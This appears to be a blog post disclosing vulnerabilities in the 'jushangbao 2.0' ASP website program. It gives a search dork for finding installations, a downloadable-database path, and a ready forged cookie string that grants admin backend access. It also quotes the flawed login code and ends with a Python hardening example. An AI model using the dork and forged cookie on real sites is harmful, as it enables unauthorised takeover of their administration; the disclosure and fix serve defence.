FROM www.st999.cn/blog BY long time computer
Program: jushangbao 2.0
Google Keyword: intext: technical support: benming technology jushangbao
A few days ago I came across a program called jushangbao and downloaded its source code. Today I took a quick look at it...
Vulnerabilities: database exposure (the database file can be downloaded) and cookie spoofing on the admin backend.
1) Requesting conn/conn.asp directly exposes the database path. The database can then be downloaded, the stored password decrypted, and the backend logged into.
2) Cookie spoofing: the relevant code from check.asp in the admin folder:
Dim uid, upwd
uid = Replace_Text(Request.Form("userid"))
upwd = md5(Replace_Text(Request.Form("password")), 16)
Verifycode = Replace_Text(Request.Form("verifycode"))
If Not IsNumeric(Verifycode) Then
    Call Logerr()
    Call ErroFy()
End If
If CInt(Verifycode) <> Session("SafeCode") Then
    Call ErroFy()
Else
    Set rs = Server.CreateObject("ADODB.Recordset")
    sqltext = "select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
    rs.Open sqltext, conn, 1, 1
    If rs.Eof And rs.Bof Then
        Response.Write "<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
        Response.Write "<tr>"
        Response.Write "<th class=tableHeaderText colSpan=2 height=25>Error prompt</th>"
        Response.Write "<tr><tr><td height=85 valign=top class=forumRow><div align=center><br>Incorrect login name or password!</div></td></tr>"
        Response.Write "<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt; Return to the previous page</a></td>"
        Response.Write "</tr>"
        Response.Write "</table>"
    Else
        ' The administrator's identity and privilege level are written to the client
        ' as plain, unsigned cookies. Nothing ties them to a server-side session, so the
        ' backend later trusts whatever values the browser sends back.
        Response.Cookies("globalecmaster") = rs("username")
        Response.Cookies("masterflag") = rs("flag")
        Response.Cookies("adminid") = rs("id")
        LastLogin = Date()
        LastLoginIP = getIP()
        SQL = "update benming_master set LastLogin='" & LastLogin & "', LastLoginIP='" & LastLoginIP & "' where username='" & uid & "'"
        Conn.Execute(SQL)
        Response.Write "<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
        Response.Write "<tr>"
        Response.Write "<th class=tableHeaderText colSpan=2 height=25>Login success prompt</th>"
        Response.Write "<tr><tr><td height=85 valign=top class=forumRow><div align=center><br>The website administrator is successfully authenticated!<br>Entering the backend automatically in 2 seconds...</div></td></tr>"
        Response.Write "<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>Go to backend management</a></td>"
        Response.Write "</tr>"
        Response.Write "</table>"
%>
<meta http-equiv="refresh" content="2;url=index.asp">
<%
    End If
    rs.Close
    Set rs = Nothing
End If

' Error page shown when the verification code is missing or wrong.
' (In the original file this Sub sits between the If and Else above; it is moved here so the block parses.)
Sub ErroFy()
    Response.Write "<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
    Response.Write "<tr>"
    Response.Write "<th class=tableHeaderText colSpan=2 height=25>Error prompt</th>"
    Response.Write "<tr><tr><td height=85 valign=top class=forumRow><div align=center><br>Incorrect verification code!</div></td></tr>"
    Response.Write "<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt; Return to the previous page</a></td>"
    Response.Write "</tr>"
    Response.Write "</table>"
    Response.End()
End Sub
Exploit method: open the backend directly with AD, set the following cookie, then access admin/index.asp to log in.
globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1
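As an added illustration of why the cookie check above fails and how it is fixed (not code from the jushangbao project, and written in Python to model the logic rather than in ASP), the block below contrasts the original design, which trusts the plaintext globalecmaster/masterflag/adminid cookies, with a single HMAC-signed cookie the server can verify; the key, cookie layout and function names are assumptions made for this example.

```python
import hashlib
import hmac
from urllib.parse import quote, unquote

# Constructed placeholder key for this example; a real deployment loads a random
# secret from configuration and rotates it, never a hard-coded literal.
SERVER_KEY = b"example-only-replace-with-random-secret"


def is_admin_plaintext(cookies: dict) -> bool:
    """Models the original check.asp design: the backend believes whatever
    'globalecmaster' / 'adminid' values the browser presents, so a client
    that simply sets them passes without ever knowing the password."""
    return "globalecmaster" in cookies and cookies.get("adminid", "").isdigit()


def _tag(payload: str) -> str:
    # HMAC-SHA256 over the payload; only a holder of SERVER_KEY can produce it.
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_signed_cookie(username: str, flag: str, admin_id: int) -> str:
    """Hardened variant: one cookie carrying the same three fields plus an HMAC
    over them. Fields are percent-encoded so '|' cannot appear inside a field."""
    payload = "|".join([quote(username, safe=""), quote(flag, safe=""), str(admin_id)])
    return payload + "." + _tag(payload)


def verify_signed_cookie(cookie: str):
    """Returns the identity dict if the tag matches, else None. Editing the
    username, flag or id, or building a cookie without the key, fails the check."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep or not hmac.compare_digest(_tag(payload), tag):
        return None
    user, flag, admin_id = payload.split("|")
    return {"username": unquote(user), "flag": unquote(flag), "adminid": int(admin_id)}
```

Even with a signed cookie, the simpler fix for this code base is to keep the administrator's identity in the server-side Session object and hand the browser only an opaque session id, so no privilege data lives on the client at all.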